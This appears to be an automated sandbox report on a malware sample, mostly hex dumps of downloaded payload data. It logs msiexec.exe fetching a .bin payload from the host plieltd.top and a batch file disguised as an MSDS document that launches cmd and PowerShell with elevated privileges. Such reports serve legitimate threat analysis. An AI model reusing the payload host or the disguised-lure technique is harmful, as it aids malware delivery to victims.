                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 45 56 37 32 52 35 67 47 39 5a 65 45 42 46 66 47 5a 69 58 38 79 75 49 69 48 47 74 47 41 2b 74 61 32 6c 59 69 39 67 48 66 70 4d 61 56 6b 71 59 77 36 49 42 79 39 35 79 70 4c 73 35 74 63 55 77 75 6f 4b 74 7a 76 4a 63 63 44 65 44 55 45 78 67 74 67 42 77 71 41 47 59 6a 44 72 38 68 37 49 32 76 56 50 59 79 37 77 31 6d 35 34 57 62 6f 4c 4b 32 38 39 58 73 77 30 7a 35 4f 2b 55 39 67 4c 46 6a 52 76 2f 31 63 71 35 50 50 42 76 63 54 68 42 78 77 49 71 6d 55 47 45 48 2b 78 38 49 31 4b 74 53 59 55 71 5a 75 67 78 59 35 74 31 7a 57 6b 6e 4b 31 6f 72 43 66 4b 70 79 66 35 41 59 35 79 79 59 68 31 4d 6e 42 62 4a 51 4a 73 61 49 33 34 68 5a 75 49 42 33 48 7a 6b 79 66 4d 35 59 76 6f 7a 31 37 6e 36 78 78 58 79 6c 74 4a 4b 43 38 54 4d 72 50 48 56 62 58 2f 78 61 77 31 51 6c 37 79 36
                                                                                                  Data Ascii: EV72R5gG9ZeEBFfGZiX8yuIiHGtGA+ta2lYi9gHfpMaVkqYw6IBy95ypLs5tcUwuoKtzvJccDeDUExgtgBwqAGYjDr8h7I2vVPYy7w1m54WboLK289Xsw0z5O+U9gLFjRv/1cq5PPBvcThBxwIqmUGEH+x8I1KtSYUqZugxY5t1zWknK1orCfKpyf5AY5yyYh1MnBbJQJsaI34hZuIB3HzkyfM5Yvoz17n6xxXyltJKC8TMrPHVbX/xaw1Ql7y6
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 76 61 48 6d 57 57 77 33 77 41 53 39 38 6a 56 73 62 4c 5a 36 69 44 76 6f 45 6d 61 76 4f 30 56 58 70 34 6d 6d 42 34 68 57 39 6e 46 66 35 78 65 48 4b 6d 44 6b 4b 75 4f 34 2f 64 76 37 31 53 34 48 49 45 69 70 36 4e 48 72 68 48 4f 76 44 7a 50 4e 7a 6c 68 6b 50 4e 51 39 2b 50 73 37 4c 6d 46 50 49 35 37 7a 31 39 56 39 56 52 4c 6b 76 4a 4b 54 42 44 51 36 4b 39 34 4a 38 58 65 46 46 59 42 73 49 44 6e 70 4a 78 48 59 6a 36 4e 6a 32 2f 4e 4b 65 47 43 55 30 6e 30 73 2f 4b 38 34 68 62 72 74 6c 67 2f 2f 75 64 2f 58 39 62 58 69 56 5a 47 79 4b 32 32 34 4f 55 66 4b 4c 41 68 72 76 4e 61 50 69 54 71 55 79 65 64 63 4c 47 6e 78 71 44 70 46 35 65 4a 67 46 39 35 41 58 35 45 45 50 36 49 65 6b 35 31 6e 4b 57 46 48 43 47 56 79 35 47 34 75 45 4d 39 73 46 70 61 57 42 67 6c 79 50 74 52
                                                                                                  Data Ascii: vaHmWWw3wAS98jVsbLZ6iDvoEmavO0VXp4mmB4hW9nFf5xeHKmDkKuO4/dv71S4HIEip6NHrhHOvDzPNzlhkPNQ9+Ps7LmFPI57z19V9VRLkvJKTBDQ6K94J8XeFFYBsIDnpJxHYj6Nj2/NKeGCU0n0s/K84hbrtlg//ud/X9bXiVZGyK224OUfKLAhrvNaPiTqUyedcLGnxqDpF5eJgF95AX5EEP6Iek51nKWFHCGVy5G4uEM9sFpaWBglyPtR
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 39 72 6e 71 35 6e 55 6a 4b 48 63 47 71 43 43 6f 47 35 72 6b 4f 5a 49 7a 30 78 6a 6c 67 6d 6d 66 51 2f 2b 68 36 6c 4d 2f 68 31 2f 61 33 41 34 2f 62 58 44 51 6b 64 6b 6f 42 62 67 70 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 45 7a 58 46 79 64 50 50 41 6c 46 7a 77 4a 47 77 53 78 4e 39 36 6f 58 73 52 68 49 77 37 51 49 31 63 6a 39 51 34 45 37 4d 61 55 6f 5a 41 54 72 6f 42 72 6b 6c 73 6c 2b 38 61 4d 78 73 6f 79 75 56 45 42 7a 6f 49 49 72 64 70 61 32 4f 31 72 67 4a 72 48 76 58 42 71 54 6a 4d 64 76 36 6b 30 48 31 48 75 6f 66 37 54 4b 4a 63 4c 33 47 6c 69 6a 43 45 4f 33 50 64 4b 4e 57 2b 6f 57 51 6c 57 59 78 38 32 73 46 6b 38 4e 76 75 54 72 35 32 77 6f 63 47 45 67 45 56 5a 70 62 6f 38 67 47 70 41 33
                                                                                                  Data Ascii: 9rnq5nUjKHcGqCCoG5rkOZIz0xjlgmmfQ/+h6lM/h1/a3A4/bXDQkdkoBbgp1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiAZ1HYgEzXFydPPAlFzwJGwSxN96oXsRhIw7QI1cj9Q4E7MaUoZATroBrklsl+8aMxsoyuVEBzoIIrdpa2O1rgJrHvXBqTjMdv6k0H1Huof7TKJcL3GlijCEO3PdKNW+oWQlWYx82sFk8NvuTr52wocGEgEVZpbo8gGpA3
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 59 63 76 41 4c 41 55 6a 76 73 33 59 42 78 57 33 6e 76 47 5a 38 52 57 65 6b 6c 7a 30 34 56 68 2f 6a 4e 62 6e 79 57 78 38 52 78 6b 34 6c 54 50 6b 69 6c 38 76 35 77 61 66 31 47 65 50 76 4e 67 45 33 53 78 79 70 31 32 2f 59 5a 75 50 76 4a 4c 61 75 38 78 52 52 76 4b 31 4e 69 65 6b 4d 61 41 52 51 79 39 76 46 49 30 6d 58 4f 4a 59 36 62 55 2b 50 44 4f 70 43 30 4f 6e 4a 4b 4c 36 54 4c 34 56 67 36 62 48 53 42 65 71 66 74 68 4a 66 79 76 6a 4e 68 61 53 41 34 2f 62 65 74 37 71 6f 48 4b 69 63 70 61 45 73 34 2f 5a 6f 69 73 76 31 48 49 43 48 2f 32 39 50 4d 4a 30 55 70 57 73 37 41 48 2b 68 63 35 58 49 58 52 30 4f 4f 5a 58 4c 43 34 45 50 45 33 6d 4b 68 70 59 5a 42 63 44 2f 64 76 34 51 37 6c 2f 61 74 66 50 5a 55 52 69 72 61 37 6a 4f 78 46 37 37 45 4d 76 34 48 4a 49 35 44 65
                                                                                                  Data Ascii: YcvALAUjvs3YBxW3nvGZ8RWeklz04Vh/jNbnyWx8Rxk4lTPkil8v5waf1GePvNgE3Sxyp12/YZuPvJLau8xRRvK1NiekMaARQy9vFI0mXOJY6bU+PDOpC0OnJKL6TL4Vg6bHSBeqfthJfyvjNhaSA4/bet7qoHKicpaEs4/Zoisv1HICH/29PMJ0UpWs7AH+hc5XIXR0OOZXLC4EPE3mKhpYZBcD/dv4Q7l/atfPZURira7jOxF77EMv4HJI5De
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 55 67 36 55 30 52 71 4a 6e 42 6a 68 6e 37 52 46 57 72 35 57 55 67 78 39 69 35 61 4a 36 32 6b 63 4a 39 6f 39 48 48 4e 47 6c 76 53 63 44 6c 4d 6e 46 74 6a 32 6f 63 61 51 75 34 44 58 32 6f 42 76 46 4d 72 69 6f 73 61 67 53 57 77 38 4a 6c 45 42 7a 6f 49 49 6a 64 72 6e 79 65 78 4e 52 53 31 4d 37 77 69 6d 34 6a 49 79 6e 78 39 32 35 39 4a 59 61 45 6d 68 56 7a 44 44 68 55 77 76 6e 36 74 35 33 34 78 6f 4c 37 66 51 35 57 45 77 75 72 51 54 45 4d 67 35 52 52 2f 6e 79 4d 66 47 56 69 58 32 34 6f 75 4f 55 58 48 66 49 69 67 66 79 6f 6c 75 74 43 64 46 5a 48 6a 4c 52 75 34 30 50 36 2f 6b 58 48 59 43 59 71 75 30 34 66 46 53 6a 68 34 75 70 4f 7a 4a 48 6a 59 30 37 47 4c 72 62 51 42 55 67 47 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47
                                                                                                  Data Ascii: Ug6U0RqJnBjhn7RFWr5WUgx9i5aJ62kcJ9o9HHNGlvScDlMnFtj2ocaQu4DX2oBvFMriosagSWw8JlEBzoIIjdrnyexNRS1M7wim4jIynx9259JYaEmhVzDDhUwvn6t534xoL7fQ5WEwurQTEMg5RR/nyMfGViX24ouOUXHfIigfyolutCdFZHjLRu40P6/kXHYCYqu04fFSjh4upOzJHjY07GLrbQBUgGIBnUdiAZ1HYgGdR2IBnUdiAZ1HYgG
                                                                                                  2024-10-22 07:40:05 UTC1369INData Raw: 48 73 5a 67 50 30 6c 6a 74 52 6e 6f 71 42 70 30 2b 52 69 61 39 6f 6a 69 32 2f 48 75 67 72 55 58 39 30 51 33 54 37 6c 61 31 43 41 61 76 68 48 75 2b 37 47 6a 64 72 6c 62 58 4f 41 61 75 38 4c 61 71 33 4f 62 63 36 61 44 63 63 68 66 48 4e 61 57 77 6b 32 65 32 68 73 4a 34 46 66 63 50 56 4f 34 79 76 51 75 75 72 7a 4f 42 39 65 56 76 59 58 37 6d 30 68 36 62 63 6d 47 4f 4d 35 64 37 72 36 54 65 6a 78 4d 62 70 42 49 71 37 71 48 4c 51 33 6a 4f 44 71 34 38 4b 76 35 4e 63 48 48 49 51 77 38 68 36 68 34 2b 71 46 36 34 67 79 46 48 51 57 33 38 61 51 48 57 57 33 52 53 4a 45 67 36 30 32 48 2f 65 4a 70 45 66 71 71 4d 58 68 76 70 58 35 59 75 64 46 63 44 49 33 2b 73 58 6e 66 35 76 4a 4a 51 34 42 54 67 46 2f 4e 2f 4b 4b 71 64 38 53 57 68 30 2f 5a 72 6d 53 77 6a 6a 2b 59 72 68 74
                                                                                                  Data Ascii: HsZgP0ljtRnoqBp0+Ria9oji2/HugrUX90Q3T7la1CAavhHu+7GjdrlbXOAau8Laq3Obc6aDcchfHNaWwk2e2hsJ4FfcPVO4yvQuurzOB9eVvYX7m0h6bcmGOM5d7r6TejxMbpBIq7qHLQ3jODq48Kv5NcHHIQw8h6h4+qF64gyFHQW38aQHWW3RSJEg602H/eJpEfqqMXhvpX5YudFcDI3+sXnf5vJJQ4BTgF/N/KKqd8SWh0/ZrmSwjj+Yrht


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649846104.21.56.1894432996C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-22 07:40:35 UTC171OUTGET /dUEhUdoBD66.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: plieltd.top
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-10-22 07:40:36 UTC977INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 22 Oct 2024 07:40:36 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 494656
                                                                                                  Connection: close
                                                                                                  Last-Modified: Tue, 22 Oct 2024 04:42:34 GMT
                                                                                                  ETag: "78c40-6250965e7164a"
                                                                                                  Cache-Control: max-age=14400
                                                                                                  CF-Cache-Status: MISS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PO2qVJoTm6%2FNqz7Y45hHmWHs0cRlQOdsN2puaPnAZrAmY9P1sYElfwR7KMin3PfXdQgJOjLB2OLDNW3orI6NGqQKK8FU9GpBvhKj0mzmABD9dJq%2FDHkfzu2nnOSrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d67d713cbef4754-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1078&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=809&delivery_rate=2644748&cwnd=247&unsent_bytes=0&cid=5e2e51dc1d04a6ef&ts=910&x=0"
                                                                                                  2024-10-22 07:40:36 UTC392INData Raw: 6c c4 44 b1 d4 7d 4a 35 b6 b9 7e 07 b7 63 fc 7d 72 34 b5 c7 cc 45 e6 c0 32 66 4f 85 91 f1 1d 63 fd 33 9a 07 f8 ce d7 fb 98 ef 5d 64 2e d9 50 93 a1 c2 29 69 f8 89 aa 5d 5b b1 7c e6 f8 94 4f 4f fb 36 d3 03 1a 9d 2f c1 ae 10 6d 68 0d b6 c6 2d a6 93 69 36 90 22 5d 7b 6e 98 df 51 00 08 4c f5 ee 62 cd 1c 2c 96 0e d0 bc 1b 43 8e 98 58 8e 4f 8f 97 de 65 6e 7b 1a e5 b5 46 e1 3a d0 7f 33 aa f8 8c b5 2d 9b bb 9d 3c f3 fd 21 db 18 c8 7d 9d 70 6d b8 9a 02 d9 32 fb b5 0e d4 21 39 0d bb 84 33 39 c5 e0 6d 21 60 54 09 54 8f e1 7c 5e 3f 5a 41 e7 cb 7a 12 b7 df d9 8e 34 a6 79 7f 69 90 f4 f9 36 fa 89 bf 39 c6 1e 0c a8 eb 3e 87 85 7e 1d 15 eb 83 92 cf 40 26 12 d9 8c 51 f6 f2 cc 6d 5d e2 8f 25 5a e2 74 b3 4a 05 15 cc 32 23 bc cb 5e 34 3d 75 0b 4f fd 4e dc 3b 1d 85 3f ac 10 d2
                                                                                                  Data Ascii: lD}J5~c}r4E2fOc3]d.P)i][|OO6/mh-i6"]{nQLb,CXOen{F:3-<!}pm2!939m!`TT|^?ZAz4yi69>~@&Qm]%ZtJ2#^4=uON;?
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 25 43 87 12 44 44 b6 33 db ee f6 94 bd 56 3a 19 48 bd 45 f7 87 1b a7 12 d3 16 ab 2f 1d 53 c5 b2 e2 b2 33 8d f6 c5 0b db 4a ac d7 9c 5f d4 46 fe 9f 74 fd 30 44 8e 00 5c f2 e0 88 d9 d4 1a 9b 10 18 7a 80 1b 69 f3 da 85 c0 c6 29 98 74 02 d7 7f 49 68 88 bd 25 e9 a4 16 50 fa 3a fc d0 c2 86 f5 b5 2b 2c 7c 17 b4 c1 0b d3 55 b5 c1 89 1a b8 ad 9d 16 08 25 75 4b c9 fd 2b d8 da 95 60 99 ef d5 d2 e2 d8 98 61 9d e0 b2 51 68 4a c8 14 28 36 fe 76 d3 d4 a5 a6 71 bf 66 67 03 8f f4 49 08 6b 51 68 3e 26 89 86 3b ac e4 79 54 73 ae f2 b1 4c df 8d 9d 41 04 54 a0 77 72 9d c4 88 64 14 30 ed 29 c5 bb c0 18 6e 72 92 f3 3b dc 73 e1 25 15 1e af f1 b2 15 3d d3 2c 45 4e 61 6f 29 24 31 66 05 00 fb 6e ac d3 10 1d 09 12 ba a9 32 8b 91 95 e9 18 59 79 12 64 17 21 48 84 9c 8e 20 33 0f 3f 48
                                                                                                  Data Ascii: %CDD3V:HE/S3J_Ft0D\zi)tIh%P:+,|U%uK+`aQhJ(6vqfgIkQh>&;yTsLATwrd0)nr;s%=,ENao)$1fn2Yyd!H 3?H
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: e9 13 5c 75 9e d2 83 27 b9 44 82 e3 bb be 9a be c6 73 bb 97 71 52 13 11 f1 be 5b 5d a2 1e c3 dc 24 46 1b 8f 9e 2f 5a b2 40 05 3c e3 57 71 84 be 42 a2 e2 44 65 e7 fc f9 68 36 fe 7e 09 1b 1e d7 ab cb dd de 82 12 2c bf 76 76 db 16 e6 a1 be 54 63 da 27 bd fd c7 d3 5c a7 fa 2e 25 aa 2f 75 56 44 f7 e2 7a c3 b9 f5 c1 52 18 f3 64 83 db 5d 3c 37 72 9f 74 85 3f c5 db 00 b4 10 d4 9b d9 8d c9 22 a0 4c 3d 80 f3 22 ff da 85 a8 df a8 dd 74 ea 1b 4b f2 86 d7 7e 98 08 f0 51 50 82 a3 f1 6c 88 ee d6 34 6e 2c 94 a1 80 c2 0b 8a 96 0c b9 dc 5d b8 45 15 fb 0f 25 d5 5d 48 b8 7b e3 7c a1 5b 99 b6 16 b8 e2 61 60 35 da e0 5a d9 5b 4a c8 7c 1f b7 bb 92 e8 5a 91 bd 71 e6 a5 85 d0 30 6c 5c 4f 6b b9 18 0d 26 89 ee 7a 2d a1 79 2c 06 9a f1 b4 15 1c 34 85 17 43 54 48 35 7f 9d c4 e0 2f 95
                                                                                                  Data Ascii: \u'DsqR[]$F/Z@<WqBDeh6~,vvTc'\.%/uVDzRd]<7rt?"L="tK~QPl4n,]E%]H{|[a`5Z[J|Zq0l\Ok&z-y,4CTH5/
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 4f 89 5d 0a 07 2e ba 0f 5f 59 4e de 89 61 47 50 1d 1f d8 d7 61 e2 03 3b 74 0a 87 c1 07 b3 bb b9 34 87 c2 a0 d2 5b 5c 1c 41 90 a9 8d 3a 7e 25 3f 12 68 86 02 d6 bf be e8 42 d0 7f 66 2a 25 9e 83 0b 0f 26 23 9b 36 50 95 7f eb 82 8c a8 cc 59 c1 ca d6 ba 7d 8e 35 e5 46 97 7b 9b 27 70 f3 b5 e1 1e c0 84 01 1b b3 e1 7f 77 6f 13 1d 62 56 2a 86 d1 35 c6 d0 86 f9 01 ae f6 cc 6b 36 26 51 6c 03 4a 90 20 2b 84 03 e9 55 44 17 a0 00 00 a9 49 c4 d6 13 3a 22 cc b9 44 f7 87 65 88 ac 06 7d ed 2f 4b bb 7f 99 e1 92 b8 b0 26 aa 4c db b5 f5 a2 86 0e 5f 89 96 da 5a ed 30 2c 2e 7f 19 f2 08 dd f6 d7 0a c2 46 f0 22 ab 18 79 aa 57 c9 e4 d6 c1 8a 7c 02 d7 f4 b4 8a a3 03 22 e8 a4 19 d4 10 3c fc 6c c0 05 1d b4 24 a9 0a 16 b4 c1 8b ee d1 9f 86 89 1b cd a3 16 39 e7 14 88 70 c9 ae 84 1e d4
                                                                                                  Data Ascii: O]._YNaGPa;t4[\A:~%?hBf*%&#6PY}5F{'pwobV*5k6&QlJ +UDI:"De}/K&L_Z0,.F"yW|"<l$9p
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 41 a4 74 e7 00 ed c0 96 9d 40 cf 9f 25 2f cd 45 f4 04 be 59 f0 6c 4d 2a 2a ce 1d 5b ef 07 32 84 8d 00 38 6e 65 34 ac 06 01 4d 6a f6 77 7c 58 e3 29 32 05 6a d4 86 a2 b1 b3 51 fe 0a 5d f0 e3 24 15 97 62 26 57 4e 8c e3 0b e4 89 d4 02 71 05 61 bb 45 1d 1f 0a ba 78 e3 60 2f 17 b5 47 22 02 b5 3a cb 77 94 64 e5 d4 5b d1 db ad 20 c2 cf 3b 7e ac b5 ff cc dc ad ea 37 f9 ec fc 9c 31 ce 7d ac d9 63 b2 49 2a aa 51 6a fd fa 83 e2 b6 44 82 06 15 1a cf 56 37 39 8e 94 cf 83 fa 3c f1 8c bb bb 33 f6 5f f4 51 b9 71 6c a2 d0 d6 ea 39 05 3c f4 64 29 10 fb 2a ea 1e 4c 22 0f 32 55 6a 36 a7 d7 90 a0 c2 ba ec 23 84 17 a8 55 44 12 09 06 1b d4 b1 94 1e d8 10 5e 4d 8e 84 54 17 31 e0 12 75 82 80 68 1d f0 5d 98 a5 92 98 11 dc 86 0b 24 5f c4 43 d9 5d be 66 28 60 41 2d 1a 03 9e ff 49 a2
                                                                                                  Data Ascii: At@%/EYlM**[28ne4Mjw|X)2jQ]$b&WNqaEx`/G":wd[ ;~71}cI*QjDV79<3_Qql9<d)*L"2Uj6#UD^MT1uh]$_C]f(`A-I
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: ab c8 84 ed 73 d9 90 f1 d2 ba 54 b3 d9 62 e7 32 19 19 98 ea 70 5e c4 8c d4 63 aa 80 50 63 83 bc cc e8 4f c5 b2 ac ea b1 d1 6a 6a 0e d0 98 68 7a 2c d8 24 d1 d4 94 2d 2c 55 bf 6e 91 ed 6d 90 f4 7e 02 52 29 f3 6b 9b 2c 60 a2 6d a8 9b 9b a8 63 62 29 80 e0 cb 04 32 68 25 5c ff 79 f5 d0 44 dc e1 59 8a ec 5c 3f 61 34 44 27 15 82 82 50 e3 df 1d 0c ac 9d 5f e3 98 a2 55 15 74 4c ae e2 26 7f 33 a9 d2 f7 26 c6 03 9e 88 e3 01 3a 0f 0e c5 29 65 9d 5d 8e 96 d0 bb ae f1 af 44 b0 17 5f 89 a1 7f 38 7e 9c 14 94 cd 1a 2b a4 d7 9f c8 29 a1 45 d2 9b 51 c7 4c b8 27 8e 3e eb 04 13 8e 40 fd 11 8f 53 26 08 46 44 c1 82 34 eb 24 2d 94 9f 47 cf 49 dd b1 fd 22 41 d1 68 66 9e 7c 0b d0 22 a1 8c b8 d8 64 e0 d4 f7 25 8e f3 23 f9 2f e3 a9 35 42 b7 c4 99 df 7a 41 d5 d8 a9 8a 95 e7 4b 32 94
                                                                                                  Data Ascii: sTb2p^cPcOjjhz,$-,Unm~R)k,`mcb)2h%\yDY\?a4D'P_UtL&3&:)e]D_8~+)EQL'>@S&FD4$-GI"Ahf|"d%#/5BzAK2
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 4f df 49 93 c8 cc e6 ad 79 29 7d 12 6d 68 19 7b 46 51 3a 83 69 42 8f a1 a3 73 5d 82 54 9e e8 1d b6 0a 11 e9 02 97 2c ad fe df fe dd 13 e4 99 b0 97 b5 70 68 35 69 eb 8d 6f ef e3 cd 2e d2 d8 7e 33 aa 73 65 50 2c 0e cf ca 33 da 45 c8 d9 d5 e9 29 39 4c 95 74 bb 26 5e e7 70 2b 9c 7f 37 50 ee 98 17 c4 7c 5b 85 1c d8 dd b3 59 2d 09 31 c6 ee 93 f7 28 f8 ff f7 4c 57 2d 2c f3 6d f8 f2 9a 34 52 f0 f5 1b c9 55 1f 8e e9 9f bb 39 3d 7b 8b bb a0 11 ed 33 66 e8 94 d1 3e 84 25 0e 74 88 d1 be e7 7d 58 09 e9 4e 9e 6d 65 f8 c7 0b ba 48 6a f5 96 f9 96 ae 8c fd fc 18 67 9b 9a 7d 58 32 e0 5c 8f b0 db d3 a0 4c fd 45 96 d7 7c 0b 3a 96 a6 a6 4d 65 7a fd f2 5b 43 69 57 5a f4 44 46 09 3f 8f 84 26 02 6e 21 64 ce 94 d6 e0 d4 5b d7 e3 ad 74 a1 45 01 b8 de 60 5b 63 52 ba 29 0f c9 9f 62
                                                                                                  Data Ascii: OIy)}mh{FQ:iBs]T,ph5io.~3seP,3E)9Lt&^p+7P|[Y-1(LW-,m4RU9={3f>%t}XNmeHjg}X2\LE|:Mez[CiWZDF?&n!d[tE`[cR)b
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 04 a8 87 a9 1a cf 8f 22 57 c1 fe ea 6d cf dd c1 75 d0 2a 7a 9e c5 67 54 4e b8 89 41 06 1f 3b ec 89 06 1a 51 e4 f4 13 ef 85 a1 43 18 e0 00 5a 74 a2 63 3c 3d 56 47 2f 1e c5 16 f8 cc 79 be 0f 22 13 f4 79 25 b6 35 13 88 d6 75 48 35 55 ef e6 a0 1a 1c c5 2d 1e 18 a6 de 41 db a2 84 a7 a8 8c da cf e0 d9 0e 11 9d 46 51 d8 f2 87 dd bc 1b 43 8e c7 06 d5 c4 6a ca 1c 6d 6e 11 1a 8f b4 cd ac d2 20 95 c6 55 09 f9 0f 49 9b e7 2e 92 d1 45 ec c6 2a dd 0d 1d 04 ea 67 15 fb 7e bd c4 d4 63 f4 71 8a 21 ee 29 ca 51 58 8a 0b 99 9e fb 70 fe 8b c3 c7 65 48 76 d3 fc 8b 13 d4 23 3a 2c 55 b7 62 75 bd 61 90 9e f4 b2 36 80 fb dc 64 44 48 5a b9 a8 30 60 2b a7 e5 af ac ec 7d 44 f0 6c 25 5b 9c 96 1d d6 bb 7a dc 0d 01 cd 93 6e 65 34 15 9f 86 4c 6a a6 44 e2 e6 87 8d 5e 05 e7 98 1a 74 f3 fa
                                                                                                  Data Ascii: "Wmu*zgTNA;QCZtc<=VG/y"y%5uH5U-AFQCjmn UI.E*g~cq!)QXpeHv#:,Ubua6dDHZ0`+}Dl%[zne4LjD^t
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 7f 01 b1 2b 75 f8 6f 20 cb 4c ee 05 2e 88 94 2a 08 70 e9 25 08 01 3e e0 ee 32 3f b9 06 55 3a f3 dc 37 48 cd 9e ec 82 b7 e7 1a 3c 98 81 ce e3 7b 4b 7b c0 96 f2 15 8e 48 78 73 3b ac c2 92 30 f3 59 62 13 81 fa 41 91 ea 0a ec f6 46 b5 61 f1 66 7f b5 45 68 75 c3 69 d2 ba ab 3b 54 31 dc cb f7 84 43 26 11 7f 86 96 4e 80 7b 04 86 57 9a 63 8b 95 9c ce 18 8e d2 33 6b c3 4e 4e 89 9d 20 82 11 7d 3f f7 ec 1a 25 b6 6c 13 8e 5c 61 a4 0f fa f8 1c 99 0d b6 96 a0 53 9b 81 7a 90 22 5d 2b a5 56 37 89 03 08 4c 7e 28 3c 46 f9 71 54 1e d0 d6 e4 29 8e 67 2c aa 5f de 7f 03 61 6e 7b d8 ed b5 af d4 d6 37 81 b8 ee d2 97 84 2a a0 07 9b 65 12 87 24 97 5e e8 a2 b9 3d 1a b3 eb a1 4e 97 8d d4 8a 1a bd a7 9c 3c 6d 42 19 a7 0e 4c d8 59 1e 2d 16 e0 03 3c 11 85 8a d3 77 50 49 6b 31 ae f7 be
                                                                                                  Data Ascii: +uo L.*p%>2?U:7H<{K{Hxs;0YbAFafEhui;T1C&N{Wc3kNN }?%l\aSz"]+V7L~(<FqT)g,_an{7*e$^=N<mBLY-<wPIk1
                                                                                                  2024-10-22 07:40:36 UTC1369INData Raw: 0c cd 58 00 48 7c 02 93 c9 93 1a cd ac 05 c3 36 2c a2 24 10 7a 30 91 c9 0d fa d7 dd 19 e6 f4 dc 02 db 8e b2 ff d5 f9 ba 51 bf 55 36 36 d8 fc ba 27 b2 9f 5f b7 bc 12 80 e5 3b 67 09 a1 79 49 a4 55 df f8 9f 4e 5f bd 28 37 c6 5e b2 32 d2 c4 78 00 90 d3 9b 3e 0d 62 f9 92 94 df ae 9f 53 72 e6 41 b5 d4 1d 07 3c 34 98 e5 28 3a 6f 91 30 e3 c0 4c 7f 42 4f 30 90 e2 9e 44 3b 69 3c df 2e 01 11 60 7e 14 3b 76 0f c0 c4 6e ce fd c3 0a 98 f0 ff f1 97 7e b5 45 bc 38 fa 0d b1 73 8f 27 df af a8 35 f7 ab 5c 26 11 c4 32 d5 e3 18 c2 76 34 40 b5 b1 63 f5 41 61 6a 40 06 d7 55 f8 3a 6a c5 65 44 01 8f 18 1d 12 fb 84 a8 ba 57 c6 d8 16 d8 f6 4a 64 13 ae 38 1a 14 2f d2 e1 c3 81 01 4d dd a2 90 37 13 93 75 1c e0 00 1c 11 9d ce df a7 58 5e 38 fe f2 bc 71 c8 b0 86 92 70 68 5d a1 62 f0 d4
                                                                                                  Data Ascii: XH|6,$z0QU66'_;gyIUN_(7^2x>bSrA<4(:o0LBO0D;i<.`~;vn~E8s'5\&2v4@cAaj@U:jeDWJd8/M7uX^8qph]b


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
                                                                                                  Imagebase:0x7ff7bca70000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
